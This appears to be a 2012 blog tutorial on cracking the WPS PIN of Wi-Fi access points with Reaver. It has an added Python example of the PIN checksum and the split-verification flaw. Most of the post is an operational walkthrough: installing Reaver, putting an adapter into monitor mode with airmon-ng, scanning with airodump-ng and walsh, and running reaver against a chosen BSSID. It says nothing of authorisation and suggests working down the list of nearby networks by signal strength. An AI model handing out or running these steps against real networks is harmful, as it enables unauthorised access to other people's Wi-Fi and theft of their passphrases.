Tuesday, 2 October 2012


WPS (Wi-Fi Protected Setup) is a feature created in 2007 to make Wi-Fi Protected networking easy for the average user while keeping it secure. However, due to a design flaw in how the device's PIN is authenticated, it is possible to crack the PIN on a WPS-enabled AP. This has nothing to do with cracking the WPA/WPA2 PSK, although the PSK is obtained as a result of this method.

The PIN is broken down as 11112223 (example for explanation only and not to be taken literally).
The 1111 is the first half of the PIN (four digits). The 222 is the second half of the PIN (three digits). The 3 is a checksum of the entire PIN (computed over the first seven digits). Reaver must first obtain the first half of the PIN (1111) before it can go on to the second half (222). While Reaver is running you will notice that 1111 changes, 222 remains the same and 3 changes, until it obtains the first half of the PIN. Then 1111 remains the same while 222 and 3 change as it obtains the second half of the PIN.
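The PIN layout and checksum described above, as an added Python example (not the post's or Reaver's code) that shows why the split verification leaves so few guesses; the checksum rule is the public one from the WPS specification and the PIN value 12345670 is constructed for the illustration:

```python
"""Added example (not from the original post or from Reaver): why the split
PIN check makes the WPS PIN weak. The checksum rule below is the one in the
Wi-Fi Simple Configuration specification; the PIN value 12345670 used in
__main__ is a constructed illustration, not a real device's PIN."""


def wps_pin_checksum(first_seven: int) -> int:
    """Return the eighth (checksum) digit for a seven-digit PIN body:
    digits at odd positions are weighted 3, even positions 1, and the
    checksum brings the total to a multiple of 10."""
    digits = [int(d) for d in f"{first_seven:07d}"]
    accum = 3 * sum(digits[0::2]) + sum(digits[1::2])
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when pin is eight digits and its last digit is the checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def split_pin(pin: str) -> tuple:
    """Split a PIN the way the post's 1111 / 222 / 3 notation does."""
    return pin[:4], pin[4:7], pin[7]


def worst_case_guesses(split_verification: bool) -> int:
    """Maximum number of PIN guesses needed.

    Because the checksum digit is derived, only seven digits are secret.
    With the flawed split verification the AP reveals whether the first
    four digits were right before the last three are checked, so the two
    halves can be searched independently: 10**4 + 10**3 guesses instead
    of 10**7. This gap is the reason to disable PIN-based WPS on an AP.
    """
    if split_verification:
        return 10**4 + 10**3
    return 10**7


if __name__ == "__main__":
    pin = "12345670"  # constructed example PIN
    print(split_pin(pin), is_valid_pin(pin))
    print(worst_case_guesses(True), worst_case_guesses(False))
```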

Tools needed
Linux Distro (I recommend BackTrack 5r1)
Reaver https://code.google.com/p/reaver-wps/dow...=-filename
A compatible Wi-Fi adapter (research your preference, e.g. AWUS036H)
NB: Reaver only runs on Linux, which is why BackTrack 5r1 is recommended.

With BackTrack running, download Reaver.
Extract and install Reaver as follows from a terminal:
tar xvfz reaver1.xxxx (xxxx being the release number, which will change with updates)
cd reaver1.xxxx
cd src/
./configure
make
make install

Assuming no errors, let's continue.
Open a fresh terminal and let's get the adapter running in monitor mode. Type the following:

airmon-ng (this will list your Wi-Fi adapters; the most common is wlan0)
airmon-ng start wlan0 (replace wlan0 with the one listed for you)
You should receive output that tells you which interface is in monitor mode, most commonly mon0.

Now in the same terminal let's see who is around. Type the following:
airodump-ng --encrypt wpa mon0 (this will display only WPA/WPA2 encrypted networks. Let it run for 30 seconds or so until you see all the APs you can, then hit CTRL+C.)

APs should be listed by power, so you want to start with the top ones and work your way down the list. But wait.. how do I know if WPS is enabled? Glad you asked.

Open a new terminal and type the following:
walsh -i mon0 (replace mon0 as noted above. This will scan for all WPS-enabled APs in range and remove the guesswork; compare it to the airodump-ng output and pick out the highest powered AP first.)

Now we are ready to start. Go back to the terminal that you installed Reaver in and type the following:

reaver -i mon0 -b BSSID -S -vv (change mon0 as noted previously. BSSID is the MAC address of the AP; you can use the MAC from the walsh output or the airodump-ng output, as they will be the same. The -S switch reduces the packet size sent to the AP and thereby decreases the attack time. The -vv switch will display all errors and PINs tested.)

Now just let it run.

You may see the percentage in the Reaver output jump from 2% to 90% just like that. This is normal when it finds the first half of the PIN. It is also why the second half of the PIN (noted above as 222) remains constant until the first half is found.

Errors are a common thing to see and are caused by many variables. Examples:
WARNING: Receive timeout occurred
WARNING: 10 failed connections in a row
WARNING: Out of order packet received, re-trasmitting last message
Just let it run.
